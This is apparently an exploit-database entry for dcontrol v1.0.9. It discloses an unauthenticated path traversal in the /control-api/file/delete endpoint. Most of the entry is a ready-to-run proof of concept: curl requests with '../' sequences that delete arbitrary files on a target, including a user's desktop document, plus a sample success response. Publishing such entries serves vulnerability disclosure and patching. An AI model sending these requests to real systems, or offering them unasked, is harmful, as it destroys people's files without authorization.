Share
## https://sploitus.com/exploit?id=PACKETSTORM:219223
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Arbitrary File Delete
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol v1.0.9 is vulnerable to unauthenticated arbitrary file deletion via
path traversal in the /control-api/file/delete endpoint. The application
fails
to properly sanitize the 'name' parameter, allowing an attacker to use
directory
traversal sequences (../) to delete arbitrary files from the target system.
# Proof of Concept:
curl "
http://TARGET_IP:666/control-api/file/delete?name=../../../../../../Windows/Temp/test.txt
"
Response:
{"code":200,"msg":"ๆไฝๆๅ","data":"../../../../../../Windows/Temp/test.txt"}
# Additional PoC - Delete User Documents:
curl "
http://TARGET_IP:666/control-api/file/delete?name=../../../../../../users/USERNAME/Desktop/important.docx
"